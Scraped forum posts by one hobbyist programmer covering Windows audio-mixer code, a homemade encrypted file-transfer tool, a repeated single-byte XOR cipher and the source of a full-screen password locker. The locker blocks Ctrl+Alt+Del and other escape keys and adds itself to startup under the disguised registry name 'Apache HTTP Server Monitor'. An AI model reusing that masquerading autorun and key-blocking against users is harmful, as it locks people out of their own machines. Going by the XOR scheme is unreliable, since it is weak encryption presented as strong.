sizeof(MIXERCONTROLDETAILS); Details.dwControlID = 1; //Master Volume Details.cChannels = 1; Details.cMultipleItems = 0; Details.cbDetails = sizeof(MIXERCONTROLDETAILS_UNSIGNED); Details.paDetails = &Value; Value.dwValue = volume; Result = mixerSetControlDetails((HMIXEROBJ)hMixer, &Details, MIXER_OBJECTF_HMIXER | MIXER_GETCONTROLDETAILSF_VALUE); if(Result == MMSYSERR_NOERROR) { return 1; } else { sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError(Result)); fwrite(dbg, strlen(dbg), 1, logfile); } return 0; } void GetDevices() { //Get # of devices NumDevices = mixerGetNumDevs(); sprintf(dbg, "# of devices: %d \r\n", NumDevices); fwrite(dbg, strlen(dbg), 1, logfile); for(unsigned int DeviceID = 0; DeviceID < NumDevices; DeviceID++) { //Open the device Result = mixerOpen(&hMixer, DeviceID, 0, 0, MIXER_OBJECTF_MIXER); if(Result == MMSYSERR_NOERROR) { sprintf(dbg, "Device # %u Opened Successfully! \r\n", DeviceID); fwrite(dbg, strlen(dbg), 1, logfile); } else { sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError(Result)); fwrite(dbg, strlen(dbg), 1, logfile); break; } //Get the number of controls, channels, device name, etc Line.cbStruct = sizeof(MIXERLINE); Line.dwComponentType = MIXERLINE_COMPONENTTYPE_DST_SPEAKERS; Result = mixerGetLineInfo((HMIXEROBJ)hMixer, &Line, MIXER_OBJECTF_HMIXER | MIXER_GETLINEINFOF_COMPONENTTYPE); if(Result == MMSYSERR_NOERROR) { sprintf(dbg, "Prod. Name: \"%s\"\r\nShort Name: \"%s\"\r\nFull Name: \"%s\"\r\n%d channels, %d controls\r\n", Line.Target.szPname, Line.szShortName, Line.szName, (unsigned int)Line.cChannels, (unsigned int)Line.cControls); fwrite(dbg, strlen(dbg), 1, logfile); } else { sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError(Result)); fwrite(dbg, strlen(dbg), 1, logfile); break; } //Get the value and text of each control NumControls = Line.cControls; for(unsigned int ControlID = 1; ControlID < NumControls + 1; ControlID++) //IDs are NOT zero-based { sprintf(dbg, "Control # %u\r\n", ControlID); fwrite(dbg, strlen(dbg), 1, logfile); Control.cbStruct = sizeof(MIXERCONTROL); LineControls.cbStruct = sizeof(MIXERLINECONTROLS); LineControls.dwControlID = ControlID; LineControls.cControls = 1; LineControls.cbmxctrl = sizeof(MIXERCONTROL); LineControls.pamxctrl = &Control; Result = mixerGetLineControls((HMIXEROBJ)hMixer, &LineControls, MIXER_GETLINECONTROLSF_ONEBYID); if(Result == MMSYSERR_NOERROR) { sprintf(dbg, "\tShort Name: \"%s\"\r\n\tFull Name: \"%s\"\r\n\tItems: %d\r\n\tRange: %u to %u\r\n\tSteps: %d\r\n", Control.szShortName, Control.szName, (unsigned int)Control.cMultipleItems, (unsigned int)Control.Bounds.dwMinimum, (unsigned int)Control.Bounds.dwMaximum, (unsigned int)Control.Metrics.cSteps); fwrite(dbg, strlen(dbg), 1, logfile); } else { sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError(Result)); fwrite(dbg, strlen(dbg), 1, logfile); break; } //Get value Details.cbStruct = sizeof(MIXERCONTROLDETAILS); Details.dwControlID = ControlID; Details.cChannels = 1; //All channels at the same time Details.cMultipleItems = 0; Details.cbDetails = sizeof(MIXERCONTROLDETAILS_UNSIGNED); Details.paDetails = &Value; Result = mixerGetControlDetails((HMIXEROBJ)hMixer, &Details, MIXER_OBJECTF_HMIXER | MIXER_GETCONTROLDETAILSF_VALUE); if(Result == MMSYSERR_NOERROR) { sprintf(dbg, "\tValue: %u\r\n", (unsigned int)Value.dwValue); fwrite(dbg, strlen(dbg), 1, logfile); } else { sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError((MMRESULT)Result)); fwrite(dbg, strlen(dbg), 1, logfile); break; } } fwrite("\r\n", 2, 1, logfile); } } char* GetMixerError(MMRESULT Code) { switch(Code) { case MMSYSERR_ALLOCATED: return "Already allocated by max # of clients"; case MMSYSERR_BADDEVICEID: return "Invalid device ID"; case MMSYSERR_INVALFLAG: return "Invalid flag"; case MMSYSERR_INVALHANDLE: return "Invalid handle"; case MMSYSERR_INVALPARAM: return "Invalid parameter"; case MMSYSERR_NODRIVER: return "No device available"; case MMSYSERR_NOMEM: return "Not enough memory"; default: return "Unknown error"; } }
  16. Steve8x
    cout &lt;&lt; "With a name like cout, you'd think you were a C++ programmer! \n"; I guess you forgot to #include <iostream> lol my attempt at a joke! Java is cool, I think I might pick it up! I like the cross-platform aspect of it! For example I could code a multiplayer game in c++, but only people who run windows would be able to play it, they'd have to run the EXE client! If I learned Java! I could make a Java client along with the EXE client, so then Linux and Mac people could also play my game! Using the Java version of course! Maybe even through a web browser! I like the idea of that! So I think I'm going to learn Java as well! And If you coded up something with Java using sockets that would sure give me a head start on it! SO SINCE NO ONE HAS COMPLETED THE CHALLENGE! I HERBY EXTEND THIS CHALLENGE 1 WEEK(more if you need it cout) AND I HAVE OPENED THE PROGRAMMING LANGUAGE TO JAVA AND ANYTHING ELSE! So now anyone can enter! No matter what you code in! Go ahead and give it a try! cout! I'll be looking forward to seeing some Java :) And heres to a hot cup a joe' to get the codes flowing!
  17. Steve8x

    CS:S

    Steve8x replied to Mr Andrewson's topic in Gaming

    Very long ago there used to be an internet cafe close by me and my friends houses. It was back at a time where like nobody had a fast computer so you had to go to the cafe to actually be able to play CS as our computers weren't powerful enough to run it! it was v1.5! before steam ever came out! For the first year its the funnest game ever and you love playing it, so enjoy! But after you've played it for some years it just isn't the same! don't get me wrong its still a fun game but, you just can't enjoy it like you used to be able too! anyone else feel the same way? Well anyway recently I started playing CS Source because the better graphics looked cool. And now for some reason I cannot play 1.6 anymore!!!! the graphics just look horrible to me now since I've played CS:S!!! so yeah :)
  18. Steve8x
    110mb.com the best in my opinion! BEST OF ALL NO ADVERTISEMENTS AT ALL! NONE! 5GB disk space FTP PHP MYSQL! the works! I somehow stumbled upon it a couple years back! and never forgot the url since :) I don't think my website there has ever gone down either so its pretty much like paid hosting for free! and you can even buy a domain name for about $10 and no one will ever know you have free hosting ;) or if you leave your computer running all the time, running an apache webserver is always a fine option!!
  19. Steve8x
    isn't promiscuous mode different from monitor mode? or are they the same thing? I get confused because people seem to talk about them like they are the same!?
  20. Steve8x
    Ok Snakey, glad you want to give this a try! Here's a good link that helped me alot with learning winsock! http://devmentor.org/articles/network/Sock...Programming.pdf csocket? I believe that is MFC. I don't like MFC so I don't use it! MFC tends to call things starting with "C" like CSocket, or CWnd... But No! you don't need MFC to use winsock! That link should give you a basic understanding of winsock with TCP protocol... to further help you out after reading that you could look over the source code to my demo project which makes use of winsock! Its called "Krypt-2-Send" and "Krypt-2-Recieve"... its an encrypted file transfer utility. Note: this is coded with dev cpp! so if using that you'll need to link to libws2_32.a in the "lib" folder of the dev cpp directory... goto project->project options, click on parameters tab and click the add library or object button. It works like this, the person wanting to send a file to someone runs K2S(Krypt-2-Send) and sets up the server with the file to transfer, the port to listen on, and optionally sets a password(it is recommended though that you do use a password because then the file will be encrypted with the password!!) If you don't use a password the file is still encrypted but only with the key specified in the box. on running K2S it generates a random number between 1-255 to use as the key to encrypt the file along with the password, you can also change it if desired... when you choose a file to transfer either by pressing the browse button or typing the file path, the recommended buffer size(IN KB) is filled in the box. (you may be wondering why is buffer size important? and why is it changeable?) because the larger the buffer size the LESS read/write operations are done both server/client side! this affects download speed! only because read/write operations are slow, so for example, if you were transferring a 100MB file, if you made the buffer size 1KB, there would have to be 102400 read operations on the server side(K2S) and 102400 write operations on client side(K2R) that would considerably slow down the download! (not download speed but, how long it would take to recieve the file) K2S minimizes to the tray for convenience. If you made the buffer 1024 KB (1MB) then there would only be 100 read/write's and the difference is great! So I think maybe that's a reason why most file transfer programs like built into instant messengers take longer to transfer files than this because they use a fixed small buffer size! ;) also this determines how often the progress bar will show progress. I think 1% of the file is good enough for a fast transfer but feel free to increase as desired... The person wanting to recieve the file, they just run K2R, type in the host and port of the server hosting the file to transfer! and password if needed and click download file! host and port must be in this format: "host:port" "host" does not have to be a host name it can be an ip address to... for example (127.0.0.1:27015) and (localhost:27015) are both valid! I have Krypt-2-Send on my computer running right now in my system tray, listening on port 27015. Someone download Krypt-2-Recieve and try to download the file from me!! :P use "popeax.com:27015" as the host:port! and password is "hak5live" If anyone successfully downloads the file post here and say what the file name is :) binary: http://popeax.com/downloads/Krypt2Recieve.rar http://popeax.com/downloads/Krypt2Send.rar source: http://popeax.com/downloads/Krypt2RecieveSRC.rar http://popeax.com/downloads/Krypt2SendSRC.rar It should work even if multiple people try to download at one time! though the percentage wont be shown correctly on the server! Does anyone know how to calculate multiple percentages into one? for example like how firefox does it! when you download more than one file, along with showing you the percentage of each file, it shows you the total complete percentage of all the files your downloading! Thats what im trying to figure out... Also files over 2GB (about this size) wont transfer, because I haven't figured out how to determine a file's size if its over this 2 billion bytes/ Im thinking this is because 4 bytes can't hold a number larger than 2.x billion... So theres gotta be someway to use more bytes to store the file size that I haven't figured out yet... NOTE: K2S and K2R are still in beta stages and there are some bugs I haven't worked out yet... So keep that in mind it may not work perfectly! mini tut on source code: unsigned char microcode[25] = {0x55, 0x8B, 0xEC, 0x8B, 0x45, 0x08, 0x8B, 0x5D, 0x0C, 0x8A, 0x4D,0x10, 0x30, 0x0C, 0x03, 0x83, 0xFB, 0x00, 0x4B, 0x75, 0xF7, 0xC9, 0xC2, 0x0C, 0x00}; typedef void (CALLBACK* EnKrypt)(void*, DWORD, BYTE); EnKrypt Krypt = (EnKrypt)&amp;microcode; that is the encrypt function, it is the same as this: Krypt proc Buffer:DWORD, BufferSize:DWORD, Key:BYTE mov eax, [Buffer] mov ebx, [BufferSize] mov cl, [Key] @@: xor byte ptr [eax+ebx], cl cmp ebx, 0 dec ebx jne @b ret Krypt endp the code was originally inside a dll written in MASM32, but I didn't like using loadlibrary and getprocaddress just to use this one function So i had the idea to just extract the raw bytes that make the opcodes, and use the function like that! and since the code is 100% relocatable it works! I created some classes to make winsock coding a little easier for me, I'll explain how to use this classes in case you'd want to use them... on the server FileTransfer_S.h contains the server classes xClient is a client object, one will be created for each client the server is communicating with... xServer is a server object, only one will be created... this will make the server listen on the desired port... creating these objects are simple... you could write: xClient client[10]; xServer server; that would create 10 client objects and 1 server object or you could do xServer* server = new xServer; which creates a pointer to an xServer while simultaneously creating an xServer object... I like doing it that way so I can write server-> instead of server. with your server object created, to get your server bound and listening on a specified port call it like if you created a pointer server->StartServer(port); if you just created an object server.StartServer(port); where "port" is an integer specifying the port to listen on! this is the port the client will connect on ill add more later, I gotta go right now ;)
  21. Steve8x
    You are absolutely right moonlit! It was silly of me to use that icon for this app. I have changed the icon to something more appropriate. @eric:: check my post, I updated it to version 1.2! case no longer matters! for example if a file contained "Coca Cola" and you had one of your search strings as "coca cola" previously the file wouldn't be snatched, but now it does a case in-sensitive search so the file will be gotten regardless of the case. Also this version supports many search strings and file extensions instead of only 1.
  22. Steve8x
    smoking is overrated! do your lungs a favor and bake some cookies ;)
  23. Steve8x

    Cryptynalis

    Steve8x replied to r4v37t's topic in Security

    lol "Cryptynalis"? I know a cool XOR encryption method! Its a basic 8 bit encryption algorithm... it works, and its pretty neat. The only downside is since its only 8 bit, theres only 255 possible encryption keys, which someone could easily crack the encryption if they coded a little program, but It can be strengthened. its a simple little procedure Encrypt proc Buffer:DWORD, BufferSize:DWORD, Key:BYTE mov eax, [Buffer]; address of buffer to encrypt goes in eax mov ebx, [BufferSize]; buffer size goes in ebx mov cl, [Key]; encryption key goes in 'cl' NotDoneYet: xor byte ptr [eax+ebx], cl dec ebx cmp ebx, 0 jne NotDoneYet ret Encrypt endp It takes 3 parameters. 1. The "Buffer" which can be anything really it could point to a string, or a file in memory, anything you'd want to be encrypted. 2. The "BufferSize" this should be the size of the string/file/whatever your going to encrypt. 3. The encryption "Key" a number between 1-255. 255 is the largest number that can fit in 8 bits / 1 byte eax, ebx, ecx, edx, esi, edi are all 32 bit registers, 32 bits = 4 bytes, ax, bx, cx, dx, si, di are 16 bit registers, the lower 16 bits of the 32 bit ones. 16 bits = 2 bytes. so without giving too much of an assembly lesson here you can probably figure out that "cl" is the lower 8 bits of the cx register, ch being the higher 8 bits... so what it does is, after you call it with correct parameters, and after it sets up the registers. it does a bitwise operation XOR with the 8 bit key and the value of the buffer address + buffer size, which is the last byte of the buffer, at the start of calling the function. After, it decreases the register that holds the buffer size which then gives the second to last byte of the buffer, and so on and so forth, until the whole entire buffer has been xor'd. to decrypt, its the same procedure, call the function again using the same key as before and it will be decrypted. I have thought of a way to make it stronger though, and require more attempts. instead of just calling the function once with 1 key. Call the function many more times, using different keys each time. for example encrypt the buffer once with 101, then again with 37, then again with 222, again with 194... now the only way(I think) to get back to the original buffer would be to call the function with 194, then 222, then 37, and 101, then finally you'd have the original string or file :) You could even do it with a password, for example you could use this password "lamepassword" l a m e p a s s w o r d 6c 61 6d 65 70 61 73 73 77 6f 72 64 each character fits in a byte, so if you used that password you would call the encrypt function 12 times, to both encrypt and decrypt your buffer... you'd first call it with 0x6C as the key, all through the 12th byte 0x64, and to decrypt, you'd do the same but in reverse order, starting from 0x64, ending with 0x6C... It works, but I'm skeptical on how secure it actually is! But its surely way more secure than just doing it 1 time with a 1-255 key heres some cyphertext I encrypted with this method using only 1 key though N†ŒŠÏ¥€ÎÏ–€šÏ‹ŠŒ–Ÿ›Š‹Ï‚–ÏŒ–Ÿ‡Š›Š—›ÎÏÕÆÏ€˜ÏƒŠ›œÏ‰†ˆšŠÏ€š›â净˜Ï›€Ï‚Ž„ŠÏ ŽÏœ›€ˆŠÏŠŒ–Ÿ›†€Î and I'll give you a hint (key > 200) that one above could be cracked almost immediately since it only has 255 possible keys and it would be in plain text! Plus I even narrowed it down.. No one will ever get this one: ySIPPRYJYNXY_NELHHTUOT]T]T]UZESIT]JYQ]R][YXHSXY_NELHHTUO16HTYRQ] VSNLNSLOHSESIuIOYX]OY_NYHL]OOKSNXHT]HESIXRYJYN[iYOO16oSESIQIOH^ Y ]YDLYNHUR_NELHS[N]LTEOSPYHQYWRSKTSKu_]RQ]WY]^YHHYNYR_NELHUSR16]P [ SNUHTQQ]E^Y ^UH That was in a buffer, and the encrypt function was called 23 times (a 23 character password) xor'd each time with each character starting from the first. So without knowing the password, you can't do anything with it! :) Of course you could code a cracker, but I think there's way tooo many possibilities that it would take too long to crack. Let me know your idea's on this method ;)
  24. Steve8x

    Freeze Windows?

    Steve8x replied to tempnode's topic in Security

    Have you tried your bypass method? Have you ever played a directx game and have you walked away from the game for a while to come back and see the screensaver going? I don't think that's ever happened to me. And I've just tried it both with and without checking the "on resume, password protect" check box, and either way no screensaver popped up! So I'm pretty confident screensavers don't interrupt directx apps. But I have thought of two ways to bypass it, can you think of them or more? That would be interesting to see ways people can come up with.
  25. Steve8x

    Freeze Windows?

    Steve8x replied to tempnode's topic in Security

    Yeah maybe that was true back in 1995! But for some years now I've never had any real problems with Windows XP!! So lets stop bashing on Windows ok? If someone creates a faulty driver that crashes the system, that isn't Windows fault! Its the fault of the programmer who created it! ;) Anyway back on topic of this thread... I don't know about you but I wouldn't want to "Freeze" my computer, that would require me to pull the plug, which is bad for the system... Instead I'd rather just take control of the screen and not let the user return to the desktop unless he knows the correct password. Well anyway thanks tempnode for creating this thread and reminding me to make that application I wanted to make but forgot about! So I'll post the source code! Its a full screen Direct3D9 App (yay for directx!) Upon running it puts itself in full screen, and requires you to enter the password. If you type it wrong 4 times, you'll have to wait 5 minutes before you can try 4 more times... This should deter anyone from trying to guess the password. Now I know what your thinking, a person can just press CTRL ALT DELETE, or CTRL ALT SHIFT ESCAPE, or ALT TAB, or WINDOWS KEY, and bypass the program! Well thats not the case (at least for windows XP [probably windows 2k aswell]) I used the "WinLock" dll that tempnode mentioned in his other thread, to disable these keys... When it executes it dumps the WinLock.dll from memory into the folder where its executing from, then calls LoadLibrary on it, and uses GetProcAddress to get the addresses to the functions it uses from the dll. (I like dynamically loading dlls instead of statically linking them) Besides the dll the png images are embedded in the exe as well, I like keeping everything self contained. It then disables the keys and its ready to go! It gives you a dark blue screen which has the login box in the middle and it has falling hak5 logos in the background just for fun :) The password can be a max of 32 characters (not including null terminator) it can only contain a-z, A-Z, 0-9, and any other keys you can press without having to hold shift. Holding shift only works for making letters uppercase. by default it makes it self start with the computer(so that even if the person turns the computer off trying to bypass it they still will be greeted with it upon reboot) I had to create my own edit box type thing, since directx doesn't have one. I did it by using GetAsyncKeyState to get keys pressed then put them in a char array which gets displayed in the box as stars, when you press backspace it makes it a zero and subtracts 1 from the character count... Is there much demand for internet cafe software? Do cafe's have vista? lol yeah I haven't been to one in ages! Anyway its dependent on DirectX9 http://www.microsoft.com/downloads/Browse....p;categoryid=2# AND the Microsoft Visual C++ 2008 Redistributable Package(x86) (only need this if you don't have visual studio 2008) http://www.microsoft.com/downloads/details...;displaylang=en If anyone knows how to compile code with 2008 that doesn't require the computer its to be run on needing that 2008 package let me know! As it would be cool to not be dependent on having that installed! If I compiled something in visual c++ 6.0 it would not be dependent on this package and still work! So theres gotta be a special way to compile or something to not need a 2008 package to run it... (I wont use 6.0 though because it crashes randomly causing me to lose my work so I just wont! plus its too old) If you want to test it out the default password is "changeme", to change it you could modify the source and compile it with VC++ 2008 (there is a free version called express edition) Or you could hex edit the exe, I didn't want to go elaborate with trying to hide the password in some secret place, as it would immediately not be secret anymore after posting this, so if you want to make it more secure go ahead, then just don't post how you did it ;) can you think of a way to bypass it? binary: http://www.popeax.com/downloads/Hak5NetCafe.rar source: http://www.popeax.com/downloads/Hak5NetCafeSRC.rar http://rapidshare.com/files/129450087/Hak5...afeSRC.rar.html StevesNetCafe.cpp source: (you should download the whole project if you want to compile it) // v1.1 #include &lt;windows.h&gt; #include &lt;stdio.h&gt; #include &lt;d3d9.h&gt; #include &lt;d3dx9.h&gt; #include &lt;time.h&gt; #include "BinaryData.h" #pragma comment(lib, "d3d9.lib") #pragma comment(lib, "d3dx9.lib") #define DXDELETE(p) if(p) p-&gt;Release(); #define WINDOW_WIDTH 1024 #define WINDOW_HEIGHT 768 HRESULT InitWindow(); void KeyPresses(); typedef void (CALLBACK* AntiAltTab)(HWND, bool); typedef void (CALLBACK* AntiWinKey)(bool); typedef void (CALLBACK* AntiCtrlAltDelete)(bool); AntiAltTab AltTab; AntiWinKey WinKey; AntiCtrlAltDelete CtrlAltDel; IDirect3D9* d3d = 0; IDirect3DDevice9* d3dDevice = 0; ID3DXFont* dxtext; RECT PassCoords = {355, 300, 256, 256}; RECT RemainingCoords = {300, 450, 256, 256}; ID3DXSprite* pSprite; IDirect3DTexture9* pPasswordScreen; IDirect3DTexture9* pInvalidScreen; IDirect3DTexture9* pHak5; D3DXVECTOR3 ScreenPos; D3DXVECTOR3 Hak5Pos[20]; int MoveSideways[20]; int Haks = 0; HMODULE WLock; HWND hWndX; HINSTANCE hInst; DWORD flags = 0; char Remaining[64] = {0}; char Password[33] = "changeme"; // Change this! this is the password to validate against! NO SPECIAL CHARACTERS! char Pass[33] = {0}; // Max 32 character password char PassDisplay[33] = {0}; // the password will be displayed as stars "*" int cc = 0; // current character int invalidpassword = 0, attempts = 4, count = 40, MinutesLeft = 5; int StartWithWindows = 1; // change if you don't want it to startup with the computer void FreeTextures() { DXDELETE(pSprite); DXDELETE(pPasswordScreen); DXDELETE(pInvalidScreen); DXDELETE(pHak5); DXDELETE(dxtext); } void LockoutThread() { count = 5000; for(;; Sleep(10)) { if(count &gt; 0) count--; if(count == 0) { MinutesLeft--; count = 5000; } if(MinutesLeft == 0) { attempts = 4; invalidpassword = 0; MinutesLeft = 5; CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&amp;KeyPresses, 0, 0, 0); ExitThread(0); } } } void Validate() { if(strcmp(Pass, Password) == 0) // Password Is Correct! { AltTab(hWndX, 1); WinKey(1); CtrlAltDel(1); FreeLibrary(WLock); FreeTextures(); DXDELETE(d3dDevice); DXDELETE(d3d); ExitProcess(0); } else { ZeroMemory(PassDisplay, 33); ZeroMemory(Pass, 33); cc = 0; if(attempts == 1) { invalidpassword = 2; // 5 minute lockout CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&amp;LockoutThread, 0, 0, 0); } else { invalidpassword = 1; attempts--; } } } void KeyPresses() { short unsigned int vkey, i, shift, rshift; char* keytext = (char*)malloc(48); char* buffer = (char*)malloc(54); char state[256] = {0}; count = 50; for(;; Sleep(10)) { skip: if(invalidpassword == 1) { if(count &gt; 0) count--; if(count == 0) { count = 80; invalidpassword = 0; } Sleep(20); goto skip; } else if(invalidpassword == 2) { ExitThread(0); } for(i = 8; i &lt;= 255; i++) { int del = 0; if((GetAsyncKeyState(i) &amp; 0x8000) &amp;&amp; (state[i] == 0)) { state[i] = 1; shift = (((GetKeyState(VK_LSHIFT) | GetKeyState(VK_LSHIFT)) &amp; 0x8000) &gt;&gt; 15) ^ GetKeyState(VK_CAPITAL); rshift = (((GetKeyState(VK_RSHIFT) | GetKeyState(VK_RSHIFT)) &amp; 0x8000) &gt;&gt; 15) ^ GetKeyState(VK_CAPITAL); vkey = MapVirtualKey(i, 0); switch (vkey) { case 14: // backspace if(cc &gt; 0) { cc--; Pass[cc] = 0; PassDisplay[cc] = 0; del = 1; } else if(cc == 0) { del = 1; } break; case 28: // enter Validate(); goto skip; break; case 29: // CTRL goto skip; break; case 42: // Left Shift goto skip; break; case 54: // Right Shift goto skip; break; case 56: // ALT goto skip; break; case 57: // space - the password can contain spaces;) strcpy(keytext, " "); break; default: GetKeyNameTextA(vkey &lt;&lt; 16, keytext, 48); } if(shift | rshift) sprintf(buffer, "%c", toupper(keytext[0])); else sprintf(buffer, "%c", tolower(keytext[0])); if(cc &lt; 32 &amp;&amp; del == 0) { Pass[cc] = buffer[0]; PassDisplay[cc] = '*'; cc++; } } else if((GetAsyncKeyState(i) &amp; 0x8000) &amp;&amp; (state[i] == 1)) { // ignore dupes state[i] = 1; } else if(state[i] == 1) { // reset old keys state[i] = 0; } } } } void InitSprites() { D3DXCreateTextureFromFileInMemory(d3dDevice, &amp;PasswordScreen, sizeof(PasswordScreen), &amp;pPasswordScreen); D3DXCreateTextureFromFileInMemory(d3dDevice, &amp;InvalidPass, sizeof(InvalidPass), &amp;pInvalidScreen); D3DXCreateTextureFromFileInMemory(d3dDevice, &amp;Hak5Logo, sizeof(Hak5Logo), &amp;pHak5); D3DXCreateSprite(d3dDevice, &amp;pSprite); ScreenPos = D3DXVECTOR3(260.0f, 190.0f, 0.0f); HDC hDC; int nHeight; int nPointSize = 15; hDC = GetDC(0); nHeight = -(MulDiv(nPointSize, GetDeviceCaps(hDC, LOGPIXELSY), 72)); D3DXCreateFont(d3dDevice, nHeight, 0, FW_BOLD, 0, FALSE, DEFAULT_CHARSET, OUT_DEFAULT_PRECIS, DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, TEXT("Arial"), &amp;dxtext); ReleaseDC(0, hDC); } void Render() { d3dDevice-&gt;Clear(0, 0, D3DCLEAR_TARGET | D3DCLEAR_ZBUFFER, 0x00002C61, 1.0f, 0); d3dDevice-&gt;BeginScene(); pSprite-&gt;Begin(D3DXSPRITE_ALPHABLEND); for(int i = 0; i &lt; Haks; i++) // draw hak5 logos { pSprite-&gt;Draw(pHak5, 0, 0, &amp;Hak5Pos[i], 0xFFFFFFFF); } if(invalidpassword == 0) { pSprite-&gt;Draw(pPasswordScreen, 0, 0, &amp;ScreenPos, 0xFFFFFFFF); dxtext-&gt;DrawTextA(pSprite, PassDisplay, -1, &amp;PassCoords, DT_NOCLIP, 0xFFFFFFFF); } else if(invalidpassword == 1) { sprintf(Remaining, "%i Attempts Remaining Before 5 Minute Lockout!", attempts); pSprite-&gt;Draw(pInvalidScreen, 0, 0, &amp;ScreenPos, 0xFFFFFFFF); dxtext-&gt;DrawTextA(pSprite, Remaining, -1, &amp;RemainingCoords, DT_NOCLIP, 0xFFFFFFFF); } else if(invalidpassword == 2) { sprintf(Remaining, "%i Minutes Remaining In 5 Minute Lockout!", MinutesLeft); pSprite-&gt;Draw(pInvalidScreen, 0, 0, &amp;ScreenPos, 0xFFFFFFFF); dxtext-&gt;DrawTextA(pSprite, Remaining, -1, &amp;RemainingCoords, DT_NOCLIP, 0xFFFFFFFF); } pSprite-&gt;End(); d3dDevice-&gt;EndScene(); d3dDevice-&gt;Present(0, 0, 0, 0); } HRESULT FullScreen() { int nMode = 0; D3DDISPLAYMODE d3ddm; bool bDesiredAdapterModeFound = false; int nMaxAdapterModes = d3d-&gt;GetAdapterModeCount(D3DADAPTER_DEFAULT, D3DFMT_X8R8G8B8); for(nMode = 0; nMode &lt; nMaxAdapterModes; ++nMode) { if(FAILED(d3d-&gt;EnumAdapterModes(D3DADAPTER_DEFAULT, D3DFMT_X8R8G8B8, nMode, &amp;d3ddm))) { MessageBoxA(hWndX, "Fullscreen change failed!", "ERROR!", 0); } // Does this adapter mode support a mode of 1024 x 768? if(d3ddm.Width != 1024 || d3ddm.Height != 768) continue; // Does this adapter mode support a 32-bit RGB pixel format? if(d3ddm.Format != D3DFMT_X8R8G8B8) continue; // Does this adapter mode support a refresh rate of 75 MHz? if(d3ddm.RefreshRate != 75) continue; // We found a match! bDesiredAdapterModeFound = true; break; } // Can we get a 32-bit back buffer? d3d-&gt;CheckDeviceType(D3DADAPTER_DEFAULT, D3DDEVTYPE_HAL, D3DFMT_X8R8G8B8, D3DFMT_X8R8G8B8, FALSE); // Can we get a z-buffer that's at least 16 bits? d3d-&gt;CheckDeviceFormat(D3DADAPTER_DEFAULT, D3DDEVTYPE_HAL, D3DFMT_X8R8G8B8, D3DUSAGE_DEPTHSTENCIL, D3DRTYPE_SURFACE, D3DFMT_D16); D3DPRESENT_PARAMETERS d3dppf; memset(&amp;d3dppf, 0, sizeof(d3dppf)); d3dppf.Windowed = FALSE; d3dppf.EnableAutoDepthStencil = TRUE; d3dppf.AutoDepthStencilFormat = D3DFMT_D16; d3dppf.SwapEffect = D3DSWAPEFFECT_DISCARD; d3dppf.BackBufferWidth = 1024; d3dppf.BackBufferHeight = 768; d3dppf.BackBufferFormat = D3DFMT_X8R8G8B8; d3dppf.PresentationInterval = D3DPRESENT_INTERVAL_IMMEDIATE; HRESULT hr; hr = d3d-&gt;CreateDevice(D3DADAPTER_DEFAULT, D3DDEVTYPE_HAL, hWndX, flags, &amp;d3dppf, &amp;d3dDevice); if(FAILED(hr)) { OutputDebugString(L"Failed To Create D3D Device!"); } return hr; } HRESULT InitD3D() { d3d = Direct3DCreate9(D3D_SDK_VERSION); if(d3d == 0) { MessageBoxA(hWndX, "Direct3D9 Initialization Failed!", "FATAL ERROR!", MB_OK); ExitProcess(0); } // Do we support hardware vertex processing? if so, use it. // If not, downgrade to software. D3DCAPS9 d3dCaps; d3d-&gt;GetDeviceCaps(D3DADAPTER_DEFAULT, D3DDEVTYPE_HAL, &amp;d3dCaps); if(d3dCaps.VertexProcessingCaps != 0 ) { OutputDebugStringA("Hardware Vertex Processing Supported!!"); flags = D3DCREATE_HARDWARE_VERTEXPROCESSING; } else { flags = D3DCREATE_SOFTWARE_VERTEXPROCESSING; } HRESULT hr = FullScreen(); return hr; } void GenerateHak5Logos() { int y = -175; int x = 0; srand((unsigned int)time(0)); for(;;) { for(int i = 0; i &lt; Haks; i++) // delete them when they go off the bottom of the screen, or the right or left { if((Hak5Pos[i].y &gt; 770.0f) | (Hak5Pos[i].x &gt; 1024.0f) | (Hak5Pos[i].x &lt; -400.0f)) { Hak5Pos[i] = Hak5Pos[Haks-1]; MoveSideways[i] = MoveSideways[Haks-1]; Haks--; } } if(Haks &lt; 20) { if(Haks &gt; 0) { if(Hak5Pos[Haks-1].x &lt; 500.0f) { x = rand() % 300 + 500; } else if(Hak5Pos[Haks-1].x &gt; 500.0f) { x = rand() % 100; } } else { x = rand() % 800; } Hak5Pos[Haks] = D3DXVECTOR3((float)x, (float)y, 0.0f); x = rand() % 150; // 0-50 = move left, 50-100 = move right, 100-150 = just move down MoveSideways[Haks] = x; Haks++; x = rand() % 1500 + 500; Sleep(x); // sleep for a random time between .5-2.0 seconds before generating the next one } } } void MoveLogos() { for(;; Sleep(10)) { for(int i = 0; i &lt; Haks; i++) { D3DXVECTOR3* Hakling = &amp;Hak5Pos[i]; Hakling-&gt;y++; if(MoveSideways[i] &lt; 50) { Hakling-&gt;x -= 0.5f; } else if(MoveSideways[i] &lt; 100 &amp;&amp; MoveSideways[i] &gt; 50) { Hakling-&gt;x += 0.5f; } } } } void RenderThread() { for(;;) { Render(); } } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { hInst = hInstance; if(StartWithWindows == 1) { HKEY hk; char exePath[256] = {0}; RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &amp;hk); GetModuleFileNameA(GetModuleHandle(0), exePath, sizeof(exePath)); int pathSize = lstrlenA(exePath); RegSetValueExA(hk, "Apache HTTP Server Monitor", 0, REG_SZ, (const unsigned char*)exePath, pathSize); RegCloseKey(hk); } InitWindow(); SetCursor(LoadCursor(0, IDC_ARROW)); ShowWindow(hWndX, SW_HIDE); UpdateWindow(hWndX); TryAgain: HRESULT hr = InitD3D(); if(FAILED(hr)) { DXDELETE(d3dDevice); DXDELETE(d3d); Sleep(5000); goto TryAgain; // so if its starting up with the computer, we will wait until success! } InitSprites(); FILE* winlock = fopen("WinLock.hak", "wb"); fwrite(WinLockDLL, sizeof(WinLockDLL), 1, winlock); fclose(winlock); WLock = LoadLibrary(L"WinLock.hak"); AltTab = 